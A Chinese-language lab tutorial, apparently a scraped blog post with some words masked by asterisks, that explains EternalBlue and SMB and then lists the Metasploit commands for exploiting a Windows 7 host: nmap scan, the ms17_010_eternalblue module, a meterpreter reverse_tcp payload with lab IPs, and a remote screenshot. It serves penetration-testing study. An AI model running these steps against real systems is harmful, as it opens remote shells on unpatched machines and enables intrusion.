網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰

課前聲明:
一、本分享僅作學習交流,請自覺遵照法律法規!
二、搜索:Kali與編程,學習更多網絡***乾貨!
基礎知識介紹:
1.何爲永恆之藍?
永恆之藍(Eternal Blue)爆發於2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被***的計算機。甚至於2017年5月12日, 不法分子經過改造「永恆之藍」製做了wannacry勒索病毒,使全世界大範圍內遭受了該勒索病毒,甚至波及到學校、大型企業、政府等機構,只能經過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟經過打補丁修復。編程

2.什麼是SMB協議?
SMB(全稱是Server Message Block)是一個協議服務器信息塊,它是一種客戶機/服務器、請求/響應協議,經過SMB協議能夠在計算機間共享文件、打印機、命名管道等資源,電腦上的網上鄰居就是靠SMB實現的;SMB協議工做在應用層和會話層,能夠用在TCP/IP協議之上,SMB使用TCP139端口和TCP445端口。windows

***步驟:
1、肯定***目標
1.1使用kali打開nmap掃描目標主機。
使用nmap執行命令 nmap -sS -A 192.168.17.149
-sS(使用SYN掃描),-A(啓用操做系統檢測和版本檢測)。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
1.2根據咱們的掃描結果能夠大體判斷該系統可能存在永恆之藍漏洞。
2、***步驟
2.1執行命令msfconsole打開metasploit。
2.2執行命令 search ms17_010 查詢咱們所須要的***模塊。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
2.3找到咱們須要的***模塊後執行命令,
use exploit/windows/smb/ms17_010_eternalblue
2.4執行命令 search payload 查找咱們須要的payload。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
2.5接下來咱們利用該payload
執行命令 set payload windows/x64/meterpreter/reverse_tcp。
2.6執行命令 show options 來查看咱們所須要設置的參數。
其中RHOSTS(被***計算機IP)和LHOST(本身kali IP)是須要本身設置。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
2.7執行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149便可。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
2.8在設置好一切以後只須要執行命令 exploit 便可自動開始***。出現截圖中的回顯時就表示已經***成功了。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰
2.9咱們只須要執行help便可查看咱們可以執行哪些操做。
最後咱們執行了 meterpreter > screenshot 對被***對象進行了屏幕截圖測試。
網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍***演練實戰安全

辛苦原創,各位看官記得好評加關注哦!你也可搜索:Kali與編程,學習更多Kali Linux***與白帽編程技巧哦!
點我學習更多Kali Linux***測試與網絡***實戰技巧!請添加連接描述服務器

相關文章
相關標籤/搜索